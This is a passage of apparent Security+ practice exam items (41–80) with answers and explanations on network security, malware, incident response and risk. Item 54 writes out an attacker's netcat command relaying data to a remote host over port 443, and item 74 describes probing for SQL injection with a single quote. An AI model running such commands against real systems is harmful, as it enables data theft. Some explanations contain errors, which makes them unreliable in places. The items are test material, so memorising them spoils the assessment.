b. WPA2
c. AES
d. WEP

A

d. WEP

OBJ-3.4: Wired Equivalent Privacy (WEP) is a security protocol, specified in the IEEE Wireless Fidelity (Wi-Fi) standard, 802.11b, that is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what is usually expected of a wired LAN. It is the oldest form of wireless security and the weakest form. WEP can be cracked with brute force techniques in less than 5 minutes with a normal end-user computer.

41
Q

What is the utilization of insights gained from threat research and threat modeling to proactively discover evidence of adversarial TTPs within a network or system called?

a. Incident response
b. Threat hunting
c. Information assurance
d. Penetration testing

A

b. Threat hunting

OBJ-1.7: Threat hunting is the utilization of insights gained from threat research and threat modeling to proactively discover evidence of adversarial TTPs within a network or system. Penetration testing uses active tools and security utilities to evaluate security by simulating an attack on a system. A penetration test verifies that a threat exists, then actively test and bypass security controls, and finally exploit vulnerabilities on the system. Information assurance (IA) is the practice of assuring information and managing risks related to the use, processing, storage, and transmission of information or data and the systems and processes used for those purposes. Incident response is an organized approach to addressing and managing the aftermath of a security breach or cyberattack, also known as an IT incident, computer incident, or security incident. The goal is to handle the situation in a way that limits damage and reduces recovery time and costs.

42
Q

Which type of personnel control is being implemented if Kirsten must receive and inventory any items that her coworker, Bob, orders?

a. Mandatory vacation
b. Separation of duties
c. Dual control
d. Background checks

A

b. Separation of duties

OBJ-5.3: This organization is using separation of duties to ensure that neither Kirsten nor Bob can exploit the organization’s ordering processes for their own individual gain. Separation of duties is the concept of having more than one person required to complete a particular task to prevent fraud and error. Dual control, instead, requires both people to perform the action together. For example, a nuclear missile system uses dual control and requires two people to each turn a different key simultaneously to allow for a missile launch to occur. Mandatory vacation policies require employees to take time away from their job and help to detect fraud or malicious activities. A background check is a process a person or company uses to verify that a person is who they claim to be, and provides an opportunity for someone to check a person’s criminal record, education, employment history, and other activities that happened in the past in order to confirm their validity.

43
Q

What type of malicious application does not require user intervention or another application to act as a host in order for it to replicate?

a. Virus
b. Worm
c. Macro
d. Trojan

A

b. Worm

OBJ-1.2: A worm is a self-replicating type of malware that does not require user intervention or another application to act as a host in order for it to replicate. Viruses and Macros require user intervention to spread, and Trojans are hosted within another application that appears to be harmless.

44
Q

A small business recently experienced a catastrophic data loss due to flooding from a recent hurricane. The customer had no backups, and all of the hardware associated with the small business was destroyed during the flooding. As part of the rebuilding process, the small business contracts with your company to help create a disaster recovery plan to ensure this never reoccurs again. Which of the following recommendations should you include as part of the disaster recovery plan?

a. Local backups should be conducted
b. Backups should be conducted to a cloud-based storage solution
c. Purchase waterproof devices to prevent data loss
d. Local backups should be verified week to ensure no data loss occurs

A

b. Backups should be conducted to a cloud-based storage solution

OBJ-4.2: While losing the hardware is a problem for the small business, their insurance will replace the hardware if it is destroyed in a flood. The data involved is more of a concern. Therefore, backups should be the primary concern. Local backups are risky since they would be destroyed in another flood; therefore, using a cloud-based storage solution would be ideal and prevent future data loss.

45
Q

During which phase of the incident response process does an organization assemble an incident response toolkit?

a. Post-incident activity
b. Containment, eradication, and recovery
c. Detection and analysis
d. Preparation

A

d. Preparation

OBJ-4.2: During the preparation phase, the incident response team conducts training, prepares their incident response kits, and researches threats and intelligence. During the detection and analysis phase, an organization focuses on monitoring and detecting any possible malicious events or attacks. During the containment, eradication, and recovery phase of an incident response, an analyst must preserve forensic and incident information for future needs, to prevent future attacks, or to bring up an attacker on criminal charges. During the post-incident activity phase, the organization conducts after-action reports, creates lessons learned, and conducts follow-up actions to better prevent another incident from occurring.

46
Q

Which type of monitoring would utilize a network tap?

a. Passive
b. Router-based
c. Active
d. SNMP

A

a. Passive

OBJ-3.3: Network taps are devices that allow a copy of network traffic to be captured for analysis. They conduct passive network monitoring and visibility without interfering with the network traffic itself. Active monitoring relies on the scanning of targeted systems, not a network tap. Router-based monitoring would involve looking over the router’s logs and configuration files. SNMP is used to monitor network devices, but is considered a form of active monitoring and doesn’t rely on network taps.

47
Q

Which of the following would NOT be useful in defending against a zero-day threat?

a. Threat intelligence
b. Whitelisting
c. Segmentation
d. Patching

A

d. Patching

OBJ-1.6: While patching is a great way to combat threats and protect your systems, it is not effective against zero-day threats. By definition, a zero-day threat is a flaw in software, hardware or firmware that is unknown to the party or parties responsible for patching or otherwise fixing the flaw. This attack has no time (or days) between the time the vulnerability is discovered and the first attack, and therefore no patch would be available to combat it. By using segmentation, whitelisting, and threat intelligence, a cybersecurity analyst can put additional mitigations in place that would protect the network even if a zero-day attack was successful.

48
Q

An analyst just completed a port scan and received the following results of open ports: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- TCP: 80 TCP: 110 TCP: 443 TCP: 1433 TCP: 3306 TCP: 3389 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Based on these scan results, which of the following services are NOT currently operating?

a. SSH
b. RDP
c. Database
d. Web

A

a. SSH

OBJ-4.3: Based on the port numbers shown as open in the nmap scan results, SSH is not currently operating. SSH operates over port 22. Web servers use port 80 for HTTP and 443 for HTTPS. Database servers run on port 1433 (Microsoft SQL) or 3306 (MySQL). Remote Desktop Protocol runs on port 3389.

49
Q

What access control model will a network switch utilize if it requires multilayer switches to use authentication via RADIUS/TACACS+?

a. 802.3af
b. 802.1x
c. 802.1q
d. 802.11ac

A

b. 802.1x

OBJ-3.8: If you are using RADIUS/TACACS+ with the switch, you will need to use 802.1x for the protocol.

50
Q

Which law requires that government agencies and other organizations that operate systems on behalf of government agencies to comply with security standards?

a. COPPA
b. SOX
c. FISMA
d. HIPPA

A

c. FISMA

OBJ-5.2: The Federal Information Security Management Act (FISMA) is a United States federal law that defines a comprehensive framework to protect government information, operations, and assets against natural or man-made threats. FISMA requires that government agencies and other organizations that operate systems on behalf of government agencies comply with security standards. The Health Insurance Portability and Accountability Act (HIPPA) is a United States federal law designed to provide privacy standards to protect patients’ medical records and other health information provided to health plans, doctors, hospitals, and other health care providers. The Children’s Online Privacy Protection Act (COPPA) is a United States federal law that imposes certain requirements on operators of websites or online services directed to children under 13 years of age, and on operators of other websites or online services that have actual knowledge that they are collecting personal information online from a child under 13 years of age. Sarbanes–Oxley (SOX) is a United States federal law that set new or expanded requirements for all U.S. public company boards, management, and public accounting firms.

51
Q

The Security Operations Center Director for Dion Training received a pop-up message on his workstation that said, “You will regret firing me; just wait until Christmas!” He suspects the message came from a disgruntled former employee that may have set up a piece of software to create this pop-up on his machine. The director is now concerned that other code might be lurking within the network that could create a negative effect on Christmas. He directs his team of cybersecurity analysts to begin searching the network for this suspicious code. What type of malware should they be searching for?

a. Adware
b. Trojan
c. Logic bomb
d. Worm

A

c. Logic bomb

OBJ-1.2: A logic bomb is a piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met. For example, a programmer may hide a piece of code that starts deleting files should they ever be terminated from the company. The director is concerned that a logic bomb may have been created and installed on his system or across the network before the analyst was fired.

52
Q

You have just received some unusual alerts on your SIEM dashboard and want to collect the payload associated with it. Which of the following should you implement to effectively collect these malicious payloads that the attackers are sending towards your systems without impacting your organization’s normal business operations?

a. Honeypot
b. Containerization
c. Jumpbox
d. Sandbox

A

a. Honeypot

OBJ-2.1: A honeypot is a host set up with the purpose of luring attackers away from the actual network components and/or discovering attack strategies and weaknesses in the security configuration. A jumpbox is a hardened server that provides access to other hosts. A sandbox is a computing environment that is isolated from a host system to guarantee that the environment runs in a controlled, secure fashion. Containerization is a type of virtualization applied by a host operating system to provision an isolated execution environment for an application.

53
Q

Following a root cause analysis of the unexpected failure of an edge router, a cybersecurity analyst discovered that the system administrator had purchased the device from an unauthorized reseller. The analyst suspects that the router may be a counterfeit device. Which of the following controls would have been most effective in preventing this issue?

a. Conduct secure supply chain management training
b. Increase network vulnerability scan frequency
c. Ensure all anti-virus signatures are up to date
d. Verify that all routers are patched to the latest release

A

a. Conduct secure supply chain management training

OBJ-5.3: Anti-counterfeit training is part of the NIST 800-53r4 control set (SA-19(1)) and should be a mandatory part of your supply chain management training within your organization. All other options may produce security gains in the network. They are unlikely to reliably detect a counterfeit item or prevent its introduction into the organization’s supply chain. Training on detection methodologies (i.e., simple visual inspections) and training for acquisition personnel will better prevent recurrences.

54
Q

An attacker has issued the following command: nc -l -p 8080 | nc 192.168.1.76 443. Based on this command, what will occur?

a. Netcat will listen on the 192.168.1.76 interface for 443 seconds on port 8080
b. Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443
c. Netcat will listen on port 8080 and then output anything received to local interface 192.168.1.76
d. Netcat will listen for a connection from 192.168.1.76 on port 443 and output anything received to port 8080

A

b. Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443

OBJ-4.1: The proper syntax for netcat (nc) is -l to signify listening and -p to specify the listening port. Then, the | character allows multiple commands to be run during a single command execution. Next, netcat is being told to send the data to the given IP (192.168.1.76) over port 443. This is a common technique to try to bypass the firewall by sending traffic over port 443 (a secure SSL/TLS tunnel).

55
Q

Review the network diagram provided. Which of the following ACL entries should be added to the firewall to allow only the system administrator’s computer (IT) to have SSH access to the FTP, Email, and Web servers in the DMZ? ??(Note: The firewall in this network is using implicit deny to maintain a higher level of security. ACL entries are in the format of Source IP, Destination IP, Port Number, TCP/UDP, Allow/Deny.)

Internet connected to a Hub
Hub Connects to a Router.
3 areas branching out of a Router : DMZ, Intranet Workstations, Data Center

DMZ :
FTP 192.168.0.5
Web 192.168.0.6
Email 192.168.0.7

Intranet Workstations
Sales 172.16.1.2
HR 172.16.1.3
IT 172.16.1.4

Data Center
Backup 192.168.1.10
Confidential 192.168.1.11
Files 192.168.1.12

a. 192.168.0.0/24, 172.16.1.4, 22, TCP, ALLOW
b. 192.168.0.0/24, 172.16.1.4, ANY, TCP, ALLOW
c. 172.16.1.4, 192.168.0.0/24, ANY, TCP, ALLOW
d. 172.16.1.4, 192.168.0.0/24, 22, TCP, ALLOW

A

d. 172.16.1.4, 192.168.0.0/24, 22, TCP, ALLOW

OBJ-3.3: Since the scenario requires you to set up SSH access from the IT computer to all three servers in the DMZ, you will need to use a /24 subnet to set up the ACL rule correctly (or have 3 separate ACL entries). Since you can only select one in this example, you will have to use the /24 for the destination network. This means that the Source IP is 172.16.1.4 (IT computer), the Destination IP is 192.168.0.0/24 (the entire DMZ), the port is 22 for SSH and operates over TCP, and the condition is set to ALLOW.

56
Q

Which of the following would NOT be included in a company’s password policy?

a. Password history
b. Password style
c. Password complexity requirement
d. Password age

A

b. Password style

OBJ-3.7: A password policy is a set of rules designed to enhance computer security by encouraging users to employ strong passwords and use them properly. A password policy is often part of an organization’s official regulations and may be taught as part of security awareness training. It contains items like password complexity, password age, and password history requirements.

57
Q

You have been asked to install a computer in a public workspace. The computer should only be used by an authorized user. Which of the following security requirements should you implement to prevent unauthorized users from accessing the network with this computer?

a. Disable single sign-on
b. Require authentication on wake-up
c. Remove the guest account from the administrator group
d. Issue the same strong and complex password for all users.

A

b. Require authentication on wake-up

OBJ-3.8: To prevent the computer from being used inadvertently to access the network, the system should be configured to require authentication whenever the computer is woken up. Therefore, if an authorized user walks away from the computer and it goes to sleep, when another person tries to use the computer, it will ask for a username and password prior to granting them access to the network.

58
Q

Which of the following must be combined with a threat to create risk?

a. Malicious actor
b. Vulnerability
c. Mitigation
d. Exploit

A

b. Vulnerability

OBJ-1.6: A risk results from the combination of a threat and a vulnerability. A vulnerability is a weakness in a device, system, application, or process that might allow an attack to take place. A threat is an outside force that may exploit a vulnerability. Remember, a vulnerability is something internal to your organization’s security goals. Therefore, you can control, mitigate, or remediate a vulnerability. A threat is external to your organization’s security goals. A threat could be a malicious actor, a software exploit, a natural disaster, or other external factors. In the case of an insider threat, they are considered an external factor for the purposes of threats and vulnerabilities since their goals lie outside your organization’s security goals.

59
Q

Dion Training allows its visiting business partners from CompTIA to use an available Ethernet port in their conference room to establish a VPN connection back to the CompTIA internal network. The CompTIA employees should be able to obtain internet access from the Ethernet port in the conference room, but nowhere else in the building. Additionally, if a Dion Training employee uses the same Ethernet port in the conference room, they should be able to access Dion Training’s secure internal network. Which of the following technologies would allow you to configure this port and support both requirements?

a. Configure a SIEM
b. Implement NAC
c. MAC filtering
d. Create an ACL to allow access

A

b. Implement NAC

OBJ-3.3: Network Access Control (NAC) uses a set of protocols to define and implement a policy that describes how to secure access to network nodes whenever a device initially attempts to access the network. NAC can utilize an automatic remediation process by fixing non-compliant hosts before allowing network access. Network Access Control can control access to a network with policies, including pre-admission endpoint security policy checks and post-admission controls over where users and devices can go on a network and what they can do. In this scenario, implementing NAC can identify which machines are known and trusted Dion Training assets, and provide them with access to the secure internal network. NAC could also determine which are unknown machines (assumed to be those of CompTIA employees), and provide them with direct internet access only by placing them onto a guest network or VLAN. While MAC filtering could be used to allow or deny access to the network, it cannot by itself control which set of network resources could be utilized from a single ethernet port. A security information and event management (SIEM) system provides real-time analysis of security alerts generated by applications and network hardware. An access control list could define what ports, protocols, or IP addresses the ethernet port could be utilized, but it would be unable to distinguish between a Dion Training employee’s laptop and a CompTIA employee’s laptop like a NAC implementation could.

60
Q

(Sample Simulation – On the real exam for this type of question, you would receive 3-5 pictures and be asked to drag and drop them into place next to the correct term.)

Picture of hook with a paper that says : Enter your login informaiton : User name, password

Which of the following types of attacks occurs when an attacker attempts to gain confidential information or login credentials by sending targeted emails to a specific set of recipients within an organization?

a. Phishing
b. Spear phishing
c. Hoax
d. Vishing
e. Pharming

A

b. Spear phishing

OBJ-1.1: Spear phishing is the fraudulent practice of sending emails from a seemingly known or trusted sender in order to induce targeted individuals to reveal confidential information. The key to answering this question is that the attack was focused on a targeted set of people, not just an indiscriminate large group of random people.

61
Q

A vulnerability scanner has reported that a vulnerability exists in the system. Upon validation of the report, the analyst determines that this reported vulnerability does not exist on the system. What is the proper term for this situation?

a. True negative
b. False positive
c. True positive
d. False negative

A

b. False positive

OBJ-1.7: A false positive occurs when a vulnerability is detected by a scanner, but the vulnerability does not actually exist on the scanned system. A true positive occurs when a vulnerability is detected by a scanner, and the vulnerability exists on the scanned system. A true negative occurs when a vulnerability is not detected by a scanner because the vulnerability does not exist on the scanned system. A false negative occurs when a vulnerability is not detected by a scanner, but the vulnerability does actually exist on the scanned system.

62
Q

An internet marketing company decided that they didn’t want to following the rules for GDPR because it would create too much work for them. They wanted to buy insurance, but no insurance company would write them a policy to cover any fines received. They considered how much the fines might be, and decided to simply ignore the regulation and its requirements. Which of the following risk strategies did the company choose?

a. Acceptance
b. Mitigation
c. Avoidance
d. Transference

A

a. Acceptance

OBJ-5.4: The internet marketing company initial tried to transfer the risk (buy insurance), but then decided to accept the risk. To avoid the risk, the company would have changed they way it did business or would prevent European customers from signing up on their mailing list using geolocation blocks.

63
Q

Joseph would like to prevent hosts from connecting to known malware distribution domains. What type of solution should be used without deploying endpoint protection software or an IPS system?

a. Route poisoning
b. Anti-malware router filters
c. DNS blackholing
d. Subdomain whitelisting

A

c. DNS blackholing

OBJ-2.1: DNS blackholing is a process that uses a list of known domains/IP addresses belonging to malicious hosts and uses an internal DNS server to create a fake reply. Route poisoning prevents networks from sending data somewhere when the destination is invalid. Routers do not usually have an anti-malware filter, and this would be reserved for a unified threat management system. Subdomain whitelisting would not apply here because it would imply that you are implicitly denying all traffic and only allow whitelisted subdomains to be accessed from the hosts that would affect their operational utility to the organization.

64
Q

Dion Training has applied a new Group Policy to all student accounts that will lock out any account in which the student enters their password incorrectly 3 times in a row. Once the account is locked out, the student must wait 15 minutes before they can attempt to log in again. What type of attack is this mitigation strategy trying to prevent?

a. Man-in-the-Middle
b. Spoofing
c. Brute force attack
d. Privilege escalation

A

c. Brute force attack

OBJ-1.2: Since the policy will lockout the student for 15 minutes between attempts, it is a valid mitigation technique against a brute force attack. By extending the waiting period, the attacker’s brute force attempts are less effective.

65
Q

(Sample Simulation – On the real exam for this type of question, you would have to rearrange the ports into the proper order by dragging and dropping them into place.)

  1. SCP
  2. POP3
  3. SNMP
  4. Telnet

161, 22, 23, 110

Using the image provided, place the port numbers in the correct order with their associated protocols:

a. 161, 22, 110, 23
b. 110, 161, 23, 22
c. 23, 110, 22, 161
d. 22, 110, 161, 23

A

d. 22, 110, 161, 23

OBJ-3.1: For the exam, you need to know your ports and protocols. The Secure Copy (SCP) operates over port 22. Telnet operates over port 23. The Simple Network Management Protocol (SNMP) operates over port 161. The Post Office Protocol 3 (POP3) operates over port 110.

66
Q

A financial services company wants to donate some old hard drives from their servers to a local charity, but they are concerned about the possibility of residual data being left on the drives. Which of the following secure disposal methods would you recommend the company use?

a. Cryptographic erase
b. Zero-fill
c. Overwrite
d. Secure erase

A

a. Cryptographic erase

OBJ-3.2: In a cryptographic erase (CE), the storage media is encrypted by default. The encryption key itself is destroyed during the erasing operation. CE is a feature of self-encrypting drives (SED) and is often used with solid-state devices. Cryptographic erase can be used with hard drives, as well. Zero-fill is a process that fills the entire storage device with zeroes. For SSDs and hybrid drives, zero-fill-based methods might not be reliable because the device uses wear-leveling routines in the drive controller to communicate which locations are available for use to any software process accessing the device. A secure erase is a special utility provided with some solid-state drives that can perform the sanitization of flash-based devices. Overwrite is like zero-fill but can utilize a random pattern of ones and zeroes on the storage device. The most secure option would be a cryptographic erase (CE) for the scenario provided in the question.

67
Q

Which type of threat will patches NOT effectively combat as a security control?

a. Discovered software bugs
b. Known vulnerabilities
c. Malware with defined indicators of compromise
d. Zero-day attacks

A

d. Zero-day attacks

OBJ-1.6: Zero-day attacks have no known fix, so patches will not correct them. A zero-day vulnerability is a computer-software vulnerability that is unknown to, or unaddressed by, those who should be interested in mitigating the vulnerability (including the vendor of the target software). If a discovered software bug or known vulnerability is found, there is normally a patch or mitigation available for it. If a piece of malware has well-defined indicators of compromise, a patch or signature can be created to defend against it, as well.

68
Q

The paparazzi have found copies of pictures of a celebrity’s new baby online. The celebrity states they were never publicly released but were uploaded to their cloud provider’s automated photo backup. Which of the following threats was the celebrity MOST likely a victim of?

a. Unauthorized camera activation
b. Unauthorized root access
c. Unintended Bluetooth pairing
d. Leaked personal files

A

d. Leaked personal files

OBJ-1.2: When authorized users access devices through unintended connections or unauthorized users get their hands on absconded devices, they can access data on the device(s) that they were never intended to see. Every firm should have a policy for protecting data (encryption) and dealing with leaks when they occur.

69
Q

What type of threat actor is highly funded and often backed by nation-states?

a. APT
b. Hacktivist
c. Script Kiddies
d. Insider Threat

A

a. APT

OBJ-1.5: Advanced Persistent Threats are a group of hackers with great capability and intent. They are often funded by nation-states and other large organizations to conduct highly covert hacks over a long period of time for political or economic gain. Script kiddies are people who use existing computer scripts or code to hack into computers, lacking the expertise to write their own. An insider threat is a malicious threat to an organization that comes from people within the organization, such as employees, former employees, contractors, or business associates, who have inside information concerning the organization’s security practices, data, and computer systems. A hacktivist is someone who uses hacking to bring about political and social change.

70
Q

(Sample Simulation – On the real exam for this type of question, you would have to rearrange the steps into the proper order by dragging and dropping them into place.)
Using the image provided, place the port numbers in the correct order with their associated protocols

  1. TFTP
  2. SMTP
  3. HTTP
  4. DNS

Ports : 53, 69, 25, 80

a. 25, 80, 53, 69
b. 80, 53, 69, 25
c. 53, 69, 25, 80
d. 69, 25, 80, 53

A

d. 69, 25, 80, 53

OBJ-3.1: For the exam, you need to know your ports and protocols. The Trivial File Transfer Protocol (TFTP) uses port 69. The Simple Mail Transfer Protocol (SMTP) uses port 25. The Hypertext Transfer Protocol (HTTP) uses port 80. The Domain Name Service (DNS) protocol uses port 53.

71
Q

You have been investigating how a malicious actor was able to exfiltrate confidential data from a web server to a remote host. After an in-depth forensic review, you determine that the web server’s BIOS had been modified by the installation of a rootkit. After you remove the rootkit and reflash the BIOS to a known good image, what should you do in order to prevent the malicious actor from affecting the BIOS again?

a. Utilize secure boot
b. Install a host-based IDS
c. Install an anti-malware application
d. Utilize the integrity monitoring

A

a. Utilize secure boot

OBJ-3.2: Since you are trying to protect the BIOS, utilizing secure boot is the best choice. Secure boot is a security system offered by UEFI. It is designed to prevent a computer from being hijacked by a malicious OS. Under secure boot, UEFI is configured with digital certificates from valid OS vendors. The system firmware checks the operating system boot loader using the stored certificate to ensure that it has been digitally signed by the OS vendor. This prevents a boot loader that has been changed by malware (or an OS installed without authorization) from being used. The TPM can also be invoked to compare hashes of key system state data (boot firmware, boot loader, and OS kernel) to ensure they have not been tampered with by a rootkit. The other options are all good security practices, but they only apply once you have already booted into the operating system. This makes them ineffective against boot sector or rootkit attacks.

72
Q

Which of the following is a senior role with the ultimate responsibility for maintaining confidentiality, integrity, and availability in a system?

a. Privacy officer
b. Data steward
c. Data owner
d. Data custodian

A

c. Data owner

OBJ-5.5: A data owner is a person responsible for the confidentiality, integrity, availability, and privacy of information assets. They are usually senior executives and somebody with authority and responsibility. A data owner is responsible for labeling the asset and ensuring that it is protected with appropriate controls. The data owner typically selects the data steward and data custodian and has the authority to direct their actions, budgets, and resource allocations. The data steward is primarily responsible for data quality. This involves tasks such as ensuring data are labeled and identified with appropriate metadata, and that data is collected and stored in a format and with values that comply with applicable laws and regulations. The data custodian is the role that handles managing the system on which the data assets are stored. This includes responsibility for enforcing access control, encryption, and backup/recovery measures. The privacy officer is the role responsible for oversight of any PII/SPI/PHI assets managed by the company.

73
Q

Dion Training has an open wireless network called “InstructorDemos” for its instructors to use during class, but they do not want any students connecting to this wireless network. The instructors need the “InstructorDemos” network to remain open since some of their IoT devices used during course demonstrations do not support encryption. Based on the requirements provided, which of the following configuration settings should you use to satisfy the instructor’s requirements and prevent students from using the “InstructorDemos” network?

a. MAC filtering
b. Signal strength
c. QoS
d. NAT

A

a. MAC filtering

OBJ-3.4: Since the instructors need to keep the wireless network open, the BEST option is to implement MAC filtering to prevent the students from connecting to the network while still keeping the network open. Since the instructors would most likely use the same devices to connect to the network, it would be relatively easy to implement a MAC filtering based whitelist of devices that are allowed to use the open network and reject any other devices not listed by the instructors (like the student’s laptops or phones). Reducing the signal strength would not solve this issue since students and instructors are both in the same classrooms. Using Network Address Translation and Quality of Service will not prevent the students from accessing or using the open network.

74
Q

You have been hired to perform a web application security test. During the test, you notice that the site is dynamic and, therefore, must be using a backend database. You decide you want to test to determine if the site is susceptible to a SQL injection. What is the first character that you should attempt to use in breaking a valid SQL request?

a. Exclamation mark
b. Single quote
c. Semicolon
d. Double quote

A

b. Single quote

OBJ-1.3: The single quote character (‘) is used because this is the character limiter in SQL. With a single quote,’ you delimit strings, and therefore you can test whether the strings are properly escaped in the targeted application or not. If they are not escaped directly, you can end any string supplied to the application and add other SQL code after that, which is a common technique for SQL injections. A semicolon is a commonly used character at the end of a line of code or command in many programming languages. An exclamation mark is often used to comment a line of code in several languages. Double quotes are often used to contain a string being passed to a variable.

75
Q

Which of the following types of attacks occurs when an attacker calls up people over the phone and attempts to trick them into providing their credit card information?

a. Hoax
b. Spear phishing
c. Phishing
d. Pharming
e. Vishing

A

e. Vishing

OBJ-1.1: Vishing is the fraudulent practice of making phone calls or leaving voice messages purporting to be from reputable companies in order to induce individuals to reveal personal information, such as bank details and credit card numbers.

76
Q

Which of the following types of remote access technologies should NOT be used in a network due to its lack of security?

a. RDP
b. SSH
c. VPN
d. telnet

A

d. telnet

OBJ-1.6: Telnet should not be used in a network due to its weak security posture. Telnet transmits all of the data in plain text (without encryption), including usernames, passwords, commands, and data files. For this reason, it should NEVER be used in production networks and has been replaced by SSH in most corporate networks.

77
Q

An attacker has compromised a virtualized server. You are conducting forensic analysis as part of the recovery effort but found that the attacker deleted a virtual machine image as part of their malicious activity. Which of the following challenges do you now have to overcome as part of the recovery and remediation efforts?

a. File formats used by some hypervisors cannot be analyzed with traditional forensic tools
b. The attack widely fragmented the image across the host file system
c. All log files are stored within the VM disk image, therefore, they are lost
d. You will need to roll back to an early snapshot and then merge any checkpoints to the main image

A

b. The attack widely fragmented the image across the host file system

OBJ-4.5: Due to the deletion of the VM disk image, you will now have to conduct file carving or other data recovery techniques to recover and remediate the virtualized server. If the server’s host uses a proprietary file system, such as VMFS on ESXi, this can further limit support by data recovery tools. The attacker may have widely-fragmented the image across the host file system when they deleted the disk image. VM instances are most useful when they are elastic (meaning they optimally spin up when needed) and then destroyed without preserving any local data when security has performed the task, but this can lead to the potential of lost system logs. To prevent this, most VMs also save their logs to an external syslog server or file. Virtual machine file formats are image-based and written to a mass storage device. Depending on the configuration and VM state, security must merge any checkpoints to the main image, using a hypervisor tool, not recovery from an old snapshot, and then roll forward. It is possible to load VM data into a memory analysis tool, such as Volatility, although the file formats used by some hypervisors require conversion first, or it may not support the analysis tool.

78
Q

What tool can be used as an exploitation framework during your penetration tests?

a. Namp
b. Autopsy
c. Metasploit
d. Nessus

A

c. Metasploit

OBJ-4.1: The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Nessus is a very popular vulnerability scanner. It can be used to check how vulnerable your network is by using various plugins to test for vulnerabilities. Also, Nessus can be used to perform compliance auditing, like internal and external PCI DSS audit scans. The nmap tool is a port scanner. BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

79
Q

Karen lives in an area that is prone to hurricanes and other extreme weather conditions. She asks you to recommend an electrical conditioning device that will prevent her files from being corrupted if the power to the building is unstable or lost. Additionally, she would like the computer to maintain power for up to an hour of uptime to allow for a graceful shutdown of her programs and computer. Which of the following should you recommend?

a. Power distribution unit
b. Line conditioner
c. Surge protector
d. Uninterruptible power supply

A

d. Uninterruptible power supply

OBJ-2.5: An uninterruptible power supply or uninterruptible power source (UPS) is an electrical apparatus that provides emergency power to a load when the input power source becomes too low, or the main power fails. A UPS provides near-instantaneous protection from input power interruptions by using a battery backup. The on-battery run-time of most uninterruptible power sources is usually short (less than 60 minutes) but sufficient to properly shut down a computer system.

80
Q

Keith wants to validate the application file that he downloaded from the vendor of the application. Which of the following should he compare against the file to verify the integrity of the downloaded application?

a. MD5 or SHA1 hash digest of the file
b. Public key of the file
c. Private key of the file
d. File size and file creation date

A

a. MD5 or SHA1 hash digest of the file

OBJ-2.1: Keith should conduct a hash of the downloaded file and compare it against the MD5 hash digest listed on the server of this file. This file needs to be a verifiable MD5 hash file in order to validate the file integrity has not been compromised during the download. This is an important step to ensure the file was not modified in transit during the download. The other options are insufficient to guarantee the integrity of the downloaded file since integrity checking relies on the comparison of the two hash digests. A public or private key would not be assigned solely to a single file, nor do they provide integrity on their own. Public and private keys are used to ensure the confidentiality of data, whereas a hash digest ensures integrity. The file size and file creation date are additional forms of metadata that could be used to help validate the integrity of a file, but they of a much lower quality and trust factor than using a hash digest. Therefore, MD5 or SHA1 is still a better choice.